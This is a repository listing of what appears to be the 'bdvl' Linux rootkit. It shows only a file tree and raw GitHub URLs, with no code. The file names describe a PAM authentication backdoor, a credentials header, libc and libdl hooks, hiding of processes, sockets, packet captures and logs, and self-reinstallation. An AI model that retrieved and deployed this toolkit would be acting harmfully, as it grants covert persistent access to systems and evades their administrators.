├── .ascii ├── README.md ├── bedevil.sh ├── etc ├── README ├── eutils.sh ├── plibdl.sh └── ssh.sh └── modules ├── backdoor └── pam │ ├── pam.h │ ├── pam_hooks.c │ ├── pam_private.h │ ├── pam_syslog.c │ └── pam_vprompt.c ├── bdvl_util ├── bdusr.c ├── cprocname.c ├── util.h ├── v_acc.c └── xor.c ├── dir ├── chdir.c ├── dir.h ├── mkdir.c ├── opendir.c ├── readdir.c └── rmdir.c ├── exec ├── exec.h ├── execve.c └── execvp.c ├── gid ├── gid.h ├── setegid.c ├── setgid.c ├── setregid.c └── setresgid.c ├── headers ├── rk_creds.h └── symbols.h ├── hiding ├── forge_maps.c ├── forge_procnet.c ├── hidegid.c ├── hiding.h ├── pcap │ ├── pcap.c │ └── pcap.h ├── ptrace.c ├── reinstall.c ├── socket.c └── syslog │ ├── syslog.c │ └── syslog.h ├── lib_hooks ├── libdl ├── dladdr.c ├── dlinfo.c ├── dlsym.c ├── gsym.c └── libdl.h ├── ln ├── links.h └── unlink.c ├── module_includes ├── open ├── access.c ├── fopen.c ├── open.c └── open.h ├── perms ├── chmod.c ├── chown.c └── perms.h ├── prehook.c ├── pwd ├── pwd.h ├── pwnam_ent.c └── pwnam_user.c ├── rw ├── fwrite.c ├── read.c ├── rw.h └── write.c ├── stat ├── fstat.c ├── lstat.c ├── stat.c └── stat.h ├── stconsts ├── std_includes └── utmp ├── getut.c ├── putut.c └── utmp.h /.ascii: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/.ascii -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/README.md -------------------------------------------------------------------------------- /bedevil.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/bedevil.sh -------------------------------------------------------------------------------- /etc/README: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/etc/README -------------------------------------------------------------------------------- /etc/eutils.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/etc/eutils.sh -------------------------------------------------------------------------------- /etc/plibdl.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/etc/plibdl.sh -------------------------------------------------------------------------------- /etc/ssh.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/etc/ssh.sh -------------------------------------------------------------------------------- /modules/backdoor/pam/pam.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/backdoor/pam/pam.h -------------------------------------------------------------------------------- /modules/backdoor/pam/pam_hooks.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/backdoor/pam/pam_hooks.c -------------------------------------------------------------------------------- /modules/backdoor/pam/pam_private.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/backdoor/pam/pam_private.h -------------------------------------------------------------------------------- /modules/backdoor/pam/pam_syslog.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/backdoor/pam/pam_syslog.c -------------------------------------------------------------------------------- /modules/backdoor/pam/pam_vprompt.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/backdoor/pam/pam_vprompt.c -------------------------------------------------------------------------------- /modules/bdvl_util/bdusr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/bdvl_util/bdusr.c -------------------------------------------------------------------------------- /modules/bdvl_util/cprocname.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/bdvl_util/cprocname.c -------------------------------------------------------------------------------- /modules/bdvl_util/util.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/bdvl_util/util.h -------------------------------------------------------------------------------- /modules/bdvl_util/v_acc.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/bdvl_util/v_acc.c -------------------------------------------------------------------------------- /modules/bdvl_util/xor.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/bdvl_util/xor.c -------------------------------------------------------------------------------- /modules/dir/chdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/chdir.c -------------------------------------------------------------------------------- /modules/dir/dir.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/dir.h -------------------------------------------------------------------------------- /modules/dir/mkdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/mkdir.c -------------------------------------------------------------------------------- /modules/dir/opendir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/opendir.c -------------------------------------------------------------------------------- /modules/dir/readdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/readdir.c -------------------------------------------------------------------------------- /modules/dir/rmdir.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/dir/rmdir.c -------------------------------------------------------------------------------- /modules/exec/exec.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/exec/exec.h -------------------------------------------------------------------------------- /modules/exec/execve.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/exec/execve.c -------------------------------------------------------------------------------- /modules/exec/execvp.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/exec/execvp.c -------------------------------------------------------------------------------- /modules/gid/gid.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/gid/gid.h -------------------------------------------------------------------------------- /modules/gid/setegid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/gid/setegid.c -------------------------------------------------------------------------------- /modules/gid/setgid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/gid/setgid.c -------------------------------------------------------------------------------- /modules/gid/setregid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/gid/setregid.c -------------------------------------------------------------------------------- /modules/gid/setresgid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/gid/setresgid.c -------------------------------------------------------------------------------- /modules/headers/rk_creds.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/headers/rk_creds.h -------------------------------------------------------------------------------- /modules/headers/symbols.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/headers/symbols.h -------------------------------------------------------------------------------- /modules/hiding/forge_maps.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/forge_maps.c -------------------------------------------------------------------------------- /modules/hiding/forge_procnet.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/forge_procnet.c -------------------------------------------------------------------------------- /modules/hiding/hidegid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/hidegid.c -------------------------------------------------------------------------------- /modules/hiding/hiding.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/hiding.h -------------------------------------------------------------------------------- /modules/hiding/pcap/pcap.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/pcap/pcap.c -------------------------------------------------------------------------------- /modules/hiding/pcap/pcap.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/pcap/pcap.h -------------------------------------------------------------------------------- /modules/hiding/ptrace.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/ptrace.c -------------------------------------------------------------------------------- /modules/hiding/reinstall.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/reinstall.c -------------------------------------------------------------------------------- /modules/hiding/socket.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/socket.c -------------------------------------------------------------------------------- /modules/hiding/syslog/syslog.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/syslog/syslog.c -------------------------------------------------------------------------------- /modules/hiding/syslog/syslog.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/hiding/syslog/syslog.h -------------------------------------------------------------------------------- /modules/lib_hooks: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/lib_hooks -------------------------------------------------------------------------------- /modules/libdl/dladdr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/libdl/dladdr.c -------------------------------------------------------------------------------- /modules/libdl/dlinfo.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/libdl/dlinfo.c -------------------------------------------------------------------------------- /modules/libdl/dlsym.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/libdl/dlsym.c -------------------------------------------------------------------------------- /modules/libdl/gsym.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/libdl/gsym.c -------------------------------------------------------------------------------- /modules/libdl/libdl.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/libdl/libdl.h -------------------------------------------------------------------------------- /modules/ln/links.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/ln/links.h -------------------------------------------------------------------------------- /modules/ln/unlink.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/ln/unlink.c -------------------------------------------------------------------------------- /modules/module_includes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/module_includes -------------------------------------------------------------------------------- /modules/open/access.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/open/access.c -------------------------------------------------------------------------------- /modules/open/fopen.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/open/fopen.c -------------------------------------------------------------------------------- /modules/open/open.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/open/open.c -------------------------------------------------------------------------------- /modules/open/open.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/open/open.h -------------------------------------------------------------------------------- /modules/perms/chmod.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/perms/chmod.c -------------------------------------------------------------------------------- /modules/perms/chown.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/perms/chown.c -------------------------------------------------------------------------------- /modules/perms/perms.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/perms/perms.h -------------------------------------------------------------------------------- /modules/prehook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/prehook.c -------------------------------------------------------------------------------- /modules/pwd/pwd.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/pwd/pwd.h -------------------------------------------------------------------------------- /modules/pwd/pwnam_ent.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/pwd/pwnam_ent.c -------------------------------------------------------------------------------- /modules/pwd/pwnam_user.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/pwd/pwnam_user.c -------------------------------------------------------------------------------- /modules/rw/fwrite.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/rw/fwrite.c -------------------------------------------------------------------------------- /modules/rw/read.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/rw/read.c -------------------------------------------------------------------------------- /modules/rw/rw.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/rw/rw.h -------------------------------------------------------------------------------- /modules/rw/write.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/rw/write.c -------------------------------------------------------------------------------- /modules/stat/fstat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/stat/fstat.c -------------------------------------------------------------------------------- /modules/stat/lstat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/stat/lstat.c -------------------------------------------------------------------------------- /modules/stat/stat.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/stat/stat.c -------------------------------------------------------------------------------- /modules/stat/stat.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/stat/stat.h -------------------------------------------------------------------------------- /modules/stconsts: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/stconsts -------------------------------------------------------------------------------- /modules/std_includes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/std_includes -------------------------------------------------------------------------------- /modules/utmp/getut.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/utmp/getut.c -------------------------------------------------------------------------------- /modules/utmp/putut.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/utmp/putut.c -------------------------------------------------------------------------------- /modules/utmp/utmp.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attackgithub/bdvl/HEAD/modules/utmp/utmp.h --------------------------------------------------------------------------------